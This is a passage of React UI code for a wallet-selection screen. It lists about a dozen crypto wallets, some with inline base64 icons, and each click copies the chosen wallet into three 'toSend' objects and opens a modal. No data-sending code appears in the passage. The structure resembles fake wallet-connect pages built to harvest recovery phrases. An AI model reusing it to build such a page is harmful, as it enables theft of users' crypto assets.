                  ...toSend,
                  [e.target.name]: "SafePal",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "SafePal",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "SafePal",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            SafePal
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={equal}
              alt="Equal"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Equal");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Equal",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Equal",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Equal",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">Equal</div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={infinito}
              alt="Infinito"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Infinito");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Infinito",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Infinito",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Infinito",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            Infinito
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={mathwallet}
              alt="MathWallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("MathWallet");
                setToSend({
                  ...toSend,
                  [e.target.name]: "MathWallet",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "MathWallet",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "MathWallet",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            MathWallet
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={mykey}
              alt="MYKEY"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Mykey");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Mykey",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Mykey",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Mykey",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">MYKEY</div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 kSIOSl">
            <img
              src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/4gKgSUNDX1BST0ZJTEUAAQEAAAKQbGNtcwQw
                                AABtbnRyUkdCIFhZWiAH4wAHABcAEAAHABNhY3NwQVBQTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA9tYAAQAA
                                AADTLWxjbXMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtkZXNjAAABCAAAADhjc
                                HJ0AAABQAAAAE53dHB0AAABkAAAABRjaGFkAAABpAAAACxyWFlaAAAB0AAAABRiWFlaAAAB5A
                                AAABRnWFlaAAAB+AAAABRyVFJDAAACDAAAACBnVFJDAAACLAAAACBiVFJDAAACTAAAACBjaHJtAAACbAAAACRtbHVjAAAAA
                                AAAAAEAAAAMZW5VUwAAABwAAAAcAHMAUgBHAEIAIABiAHUAaQBsAHQALQBpAG4AAG1sdWMAAAAAAAAAAQAAAAxlblVTAAAAMg
                                AAABwATgBvACAAYwBvAHAAeQByAGkAZwBoAHQALAAgAHUAcwBlACAAZgByAGUAZQBsAHkAAAAAWFlaIAAAAAAAAPbWAAEAAAA
                                A0y1zZjMyAAAAAAABDEoAAAXj///zKgAAB5sAAP2H///7ov///aMAAAPYAADAlFhZWiAAAAAAAABvlAAAOO4AAAOQWFlaIAAAAAAAA
                                CSdAAAPgwAAtr5YWVogAAAAAAAAYqUAALeQAAAY3nBhcmEAAAAAAAMAAAACZmYAAPKnAAANWQAAE9AAAApbcGFyYQAAAAAAAwAAAAJ
                                mZgAA8qcAAA1ZAAAT0AAACltwYXJhAAAAAAADAAAAAmZmAADypwAADVkAABPQAAAKW2Nocm0AAAAAAAMAAAAAo9cAAFR7AABMzQAAmZ
                                oAACZmAAAPXP/bAEMABQMEBAQDBQQEBAUFBQYHDAgHBwcHDwsLCQwRDxISEQ8RERMWHBcTFBoVEREYIRgaHR0fHx8TFyIk
                                Ih4kHB4fHv/bAEMBBQUFBwYHDggIDh4UERQeHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4
                                eHh4eHv/CABEIAZABkAMBIgACEQEDEQH/xAAZAAEBAQEBAQAAAAAAAAAAAAAABwgGBQT/xAAUAQEAAAAAAAAAAAAAAAAAAA
                                AA/9oADAMBAAIQAxAAAAGSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOn5gAHtHiq5IwAUEny0cwT4AtBF1oEXdPzAdPQSLrQIutEkPiU72iLrQIutHxkj
                                AAAAAAABRpzRpyAOv5Dry6Zc1HlwAXSF3Qo05o05IWBrrIuugCFzmjTko10hd0AGXNR5cLp1/IdeAPI9fyDLgAAAAAAAKNOaNO
                                QB1/IdeXTLmo8uAC6Qu6FGnNGnJCwNdZF10AQuc0aclGukLugAy5qPLhdOv5DrwB5Hr+QZcAAAAAAABRpzRpyAOv5Dry6Zc1Hlw
                                AXSF3Qo05o05IWBrrIuugCFzmjTko10hd0AGXNR5cLp1/IdeAPI9fyDLgAAAAAAAKNOaNOQB1/IdeXTLmo8uAC6Qu6FGnNGnJCw
                                NdZF10AQuc0aclGukLugAy5qPLhdOv5DrwB5Hr+QZcAAAAAAABRpzRpyAOv5Dry6Zc1HlwAXSF3Qo05o05IWBrrIuugCFzmjTko
                                10hd0AGXNR5cLp1/IdeAPI9fyDLgAAAAAAAKNOaNOQB1/IdeXTLmo8uAC6Qu6FGnNGnJCwNdZF10AQuc0aclGukLugAy5qPLhdO
                                v5DrwB5Hr+QZcAAAAAAABRpzRpyAOv5Dry6Zc1HlwAXSF3Qo05o05IWBrrIuugCFzmjTko10hd0AGXNR5cLp1/IdeAPI9fyDLgA
                                AAAAAAOn5gAHteKK5IwAUGfC0cxPgAtEXFoRcdPzAdPQYuLQi4tEk+IU72ouLQi4tHxyMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                AAAAAAAAAAAAAAAf/EACIQAAEEAgMBAQADAAAAAAAAADUEBQYgAAcWNkACAwEQkP/aAAgBAQABBQL/AFaeGz4QoaMaP5cHRfE06dDSNsH4uqH
                                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
                                +X7GkbQ9socSc/qA/wBiI10avkFdGr5BXRq+QV0avkFL24WioCqmYnPmH3D/AFb/AP/EACAQAAEFAAEFAQAAAAAAAAAAAAERIEBR8KEAECEx0ZD/2gAIAQEAAT8h/VpKGFAhqoG/KEuJSPidAVJCSJIU4amAiMhARezxMBEYCEiveeeJQQiAVIE7EoIRBKgCNeeeeEViQvZBAvHXkCnFIHxG+eeeAVJCSJIU4jkc7totSpUqbtnc7to5HO7aLUqVKm7Z3O7aORzu2i1KlSpu2dzu2jkc7totSpUqbtnc7to5HO7aLUqVKm7Z3O7aORzu2i1KlSpu2dzu2jkc7totSpUqbtnc7to5HO7aLUqVKm7Z3O7aORzu2i1KlSpu2dzu2jkc7totSpUqbtnc7to5HO7aLUqVKm7Z3O7aORzu2i1KlSpu2dzu2jkc7totSpUqbtnc7to5HO7aLUqVKm7Z3O7aCtDCgQ0VDflCXMhP1OgKkhJAkC8tTARGAhAnZ4mAiMhABHvPPFoIRBKgi9i0EIgFSRWvPPPCKxIXsAhTnryBTigH6jfPPPAKkhJAkC8/q3//2gAMAwEAAgADAAAAEPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPNPPPPPPPPPPPPOPPPPPPPPFPKFPPFPKAFAAFKAAPPPPPPPPFPKFPPFPKAFAAFKAAPPPPPPPPFPKFPPFPKAFAAFKAAPPPPPPPPFPKFPPFPKAFAAFKAAPPPPPPPPFPKFPPFPKAFAAFKAAPPPPPPPPFPKFPPFPKAFAAFKAAPPPPPPPPFPKFPPFPKAFAAFKAAPPPPPPPPPPPHPPPPPPPPPPPPLPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP/xAAUEQEAAAAAAAAAAAAAAAAAAACQ/9oACAEDAQE/EBx//8QAFBEBAAAAAAAAAAAAAAAAAAAAkP/aAAgBAgEBPxAcf//EACEQAQABBAIDAQEBAAAAAAAAAAEhEUFQoSCBABAxUZBA/9oACAEBAAE/EP6tIXMXCrw+kifzjBlf1GlBiWnwf7PwtSWYcQeMXSTm8jr1cjxiaScXgd87rrkesTiDi0Hv0D1i8Qc2k9cbrrrh+8/QWoLsvPgk/wBaUWZK+N111w/2fhaksw/w73JOM3z58+ZuM3e5Jxm+fPnzNxm73JOM3z58+ZuM3e5Jxm+fPnzNxm73JOM3z58+ZuM3e5Jxm+fPnzNxm73JOM3z58+ZuM3e5Jxm+fPnzNxm73JOM3z58+ZuM3e5Jxm+fPnzNxm73JOM3z58+ZuM
                                3e5Jxm+fPnzNxm73JOM3z58+ZuM3e5Jxm+fPnzNxmoXM3Kpw+Emf3jBlf1GlFiGvxf7PwtQWJcQeMTSDm8nv1cjxi6QcXg9c7rrkesXiTi0Dr0D1icSc2kd8brrrl+8/UWpLkPPgk/1pQZgp43XXXL/Z+FqCxL+rf//Z"
              alt="Spatium"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Spatium");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Spatium",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Spatium",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Spatium",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            Spatium
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={walletpng}
              alt="wallet.io"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("wallet.io");
                setToSend({
                  ...toSend,
                  [e.target.name]: "wallet.io",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "wallet.io",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "wallet.io",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            wallet.io
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={infinity}
              alt="Infinity Wallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Infinity Wallet");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Infinity Wallet",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Infinity Wallet",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Infinity Wallet",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            Infinity Wallet
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={ownbit}
              alt="Ownbit"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Ownbit");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Ownbit",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Ownbit",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Ownbit",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">Ownbit</div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={easypocket}
              alt="EasyPocket"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("EasyPocket");
                setToSend({
                  ...toSend,
                  [e.target.name]: "EasyPocket",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "EasyPocket",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "EasyPocket",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            EasyPocket
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={onto}
              alt="ONTO"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("ONTO");
                setToSend({
                  ...toSend,
                  [e.target.name]: "ONTO",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "ONTO",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "ONTO",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">ONTO</div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src="data:image/png;base64,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